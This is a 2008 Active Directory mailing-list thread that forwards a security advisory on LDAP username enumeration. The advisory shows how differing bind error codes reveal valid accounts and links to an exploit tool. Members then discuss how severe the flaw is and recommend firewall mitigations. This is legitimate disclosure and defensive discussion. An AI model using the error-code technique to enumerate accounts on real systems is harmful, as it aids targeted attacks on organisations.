| Author | Messages | |
bdesmond
Posts:730
 | | 11/18/2008 3:25 PM |
| If you have it open on your LAN (expected) and someone plugs in that's enough. It comes down to your paranoia level IMO.
Thanks,
Brian Desmond
brian@briandesmond.com
c - 312.731.3132
From: ActiveDir-owner@mail.activedir.org [mailto:ActiveDir-owner@mail.activedir.org] On Behalf Of Praveen Thampi
Sent: Tuesday, November 18, 2008 2:18 PM
To: ActiveDir@mail.activedir.org
Subject: Re: [ActiveDir] [Fwd: [NT] Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability]
Thanks Brian, Deji.
BTW, why should somebody open LDAP to public. Also wondering even if the ports are allowed, they'll be only for specific ips/subnets which reduces the surface.
On Wed, Nov 19, 2008 at 1:21 AM, Akomolafe, Deji <deji@readymaids.com<mailto:deji@readymaids.com>> wrote:
It is considered a bug that can be exploited to gather information necessary to mount a better, and more targetted attack against the infrastructure. You can use this bug to enumerate the which account is PRESENT in the infrastructure, then you will use that knowledge to use your favorite "hacking" tool to target those known accounts.
This bug itself doesn't appear to give you any direct avenue of attack. I said "doesn't appear" because I am just going by the public information available about the bug. It could be worse, it could be nothing.
Sincerely,
_____
(, / | /) /) /)
/---| (/_ ______ ___// _ // _
) / |_/(__(_) // (_(_)(/_(_(_/(__(/_
(_/ /)
(/
Microsoft MVP - Directory Services
www.akomolafe.name<http://www.akomolafe.name><http://www.akomolafe.name/> - we know IT
-5.75, -3.23
Do you now realize that Today is the Tomorrow you were worried about Yesterday? -anon
________________________________
From: ActiveDir-owner@mail.activedir.org<mailto:ActiveDir-owner@mail.activedir.org> [ActiveDir-owner@mail.activedir.org<mailto:ActiveDir-owner@mail.activedir.org>] On Behalf Of Praveen Thampi [mr.praveeng@gmail.com<mailto:mr.praveeng@gmail.com>]
Sent: Tuesday, November 18, 2008 11:35 AM
To: ActiveDir@mail.activedir.org<mailto:ActiveDir@mail.activedir.org>
Subject: Re: [ActiveDir] [Fwd: [NT] Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability]
I am a novice. But can somebody explain why this extended error message is a 'vulnerability' .
I mean if I enter wrong pwd for a user few times in a domain, the account gets locked out and get the message 'account locked out'. So this means the user existed. Can this too be considered as a vulnerability?
On Tue, Nov 18, 2008 at 11:34 PM, Susan Bradley, CPA <sbradcpa@pacbell.net<mailto:sbradcpa@pacbell.net><mailto:sbradcpa@pacbell.net<mailto:sbradcpa@pacbell.net>>> wrote:
-------- Original Message --------
Subject: [NT] Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability
Date: 18 Nov 2008 19:39:05 +0200
From: SecuriTeam <support@securiteam.com<mailto:support@securiteam.com><mailto:support@securiteam.com<mailto:support@securiteam.com>>>
To: list@securiteam.com<mailto:list@securiteam.com><mailto:list@securiteam.com<mailto:list@securiteam.com>>
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability
------------------------------------------------------------------------
SUMMARY
A vulnerability in Microsoft's Windows Active Directory's LDAP server allows remote attackers to discover which usernames are valid and which are not.
DETAILS
Affected systems:
* Microsoft Windows 2000 Server Service Pack 4
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 2
An information disclosure vulnerability exists in the manner that Microsoft LDAP server responds when binding to the LDAP server. In the case when an invalid password is provided, the server will respond with result code 49 (invalidCredentials) and an error message. A different error message is returned if an invalid username is provided.
For an existing user the bind response is similar to:
80090308: LdapErr: DSID-0C090334, comment: AcceptSecurityContext error, data 52e, vece
For an non-existant user the following error message is returned:
80090308: LdapErr: DSID-0C090334, comment: AcceptSecurityContext error, data 525, vece
As you can see, the values 52e and 525 differ. The meaning associated to 52e is 'invalid credentials'. The meaning associated to 525 is 'user not found'. The server can respond with seven other error codes, which makes it possible to infer other information about the status of the account such as "account has expired" or "user account locked".
Impact:
A successful exploit of this issue can allow an attacker to anonymously enumerate users on the affected system.
Exploit:
An exploit is available at <http://labs.portcullis.co.uk/application/ldapuserenum/> http://labs.portcullis.co.uk/application/ldapuserenum/
Vendor Response and Recomendations:
* Block TCP ports 389 and 636 at the perimeter firewall.
These ports are used to initiate a connection with the affected component.
Blocking it at the enterprise firewall, both inbound and outbound, will help prevent systems that are behind that firewall from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see TCP and UDP Port Assignments ( <http://go.microsoft.com/fwlink/?LinkId=21312> http://go.microsoft.com/fwlink/?LinkId=21312). For more information about the Windows Firewall, see How to Configure Windows Firewall on a Single Computer ( <http://www.microsoft.com/technet/security/smallbusiness/prodtech/windowsxp/cfgfwall.mspx> http://www.microsoft.com/technet/security/smallbusiness/prodtech/windowsxp/cfgfwall.mspx).
Timeline:
2008/10/06 - Vulnerability discovered
2008/10/21 - Internal proof of concept ready
2008/10/23 - Advisory draft ready
2008/10/24 - Initial notification to the vendor
2008/10/28 - Vendor acknowledges notification, case opened
2008/11/05 - Vendor reproduced the issue and the bug fix will be addressed through a Service Pack release
2008/11/07 - Vendor asks to add a mitigations section to the advisory
2008/11/11 - Portcullis adds a Vendor Response and Recomendations section
2008/11/13 - Advisory published in accordance with the vendor
ADDITIONAL INFORMATION
The information has been provided by Bernardo Damele Assumpcao Guimaraes.
The original article can be found at: <http://www.portcullis.co.uk/294.php> http://www.portcullis.co.uk/294.php
========================================
This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com<mailto:list-unsubscribe@securiteam.com><mailto:list-unsubscribe@securiteam.com<mailto:list-unsubscribe@securiteam.com>> In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com<mailto:list-subscribe@securiteam.com><mailto:list-subscribe@securiteam.com<mailto:list-subscribe@securiteam.com>>
==================== ====================
DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
List info : http://www.activedir.org/List.aspx
List FAQ : http://www.activedir.org/ListFAQ.aspx
List archive: http://www.activedir.org/ma/default.aspx
List info : http://www.activedir.org/List.aspx
List FAQ : http://www.activedir.org/ListFAQ.aspx
List archive: http://www.activedir.org/ma/default.aspx
| | | |
|
|